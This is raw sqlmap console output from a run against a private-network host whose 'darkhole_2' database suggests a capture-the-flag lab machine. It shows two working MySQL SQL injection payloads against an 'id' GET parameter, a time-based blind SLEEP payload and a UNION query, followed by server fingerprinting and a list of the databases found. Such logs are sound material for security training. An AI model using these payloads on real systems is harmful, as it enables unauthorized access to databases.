        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:12:05 /2022-02-07/

[12:12:05] [INFO] parsing HTTP request from 'sql'
[12:12:05] [INFO] resuming back-end DBMS 'mysql' 
[12:12:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9080 FROM (SELECT(SLEEP(5)))BKfh) AND 'Wtsx'='Wtsx

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-2116' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x6844707a62596650494b6a4a4e5443644273415647734e416c5a7542586c4e767265584c6f6b4155,0x716a786b71)-- -
---
[12:12:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[12:12:05] [INFO] fetching database names
available databases [5]:
[*] darkhole_2
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

[12:12:05] [INFO] fetched data logged to text files under '/home/rahulr/.local/share/sqlmap/output/192.168.221.10'

[*] ending @ 12:12:05 /2022-02-07/

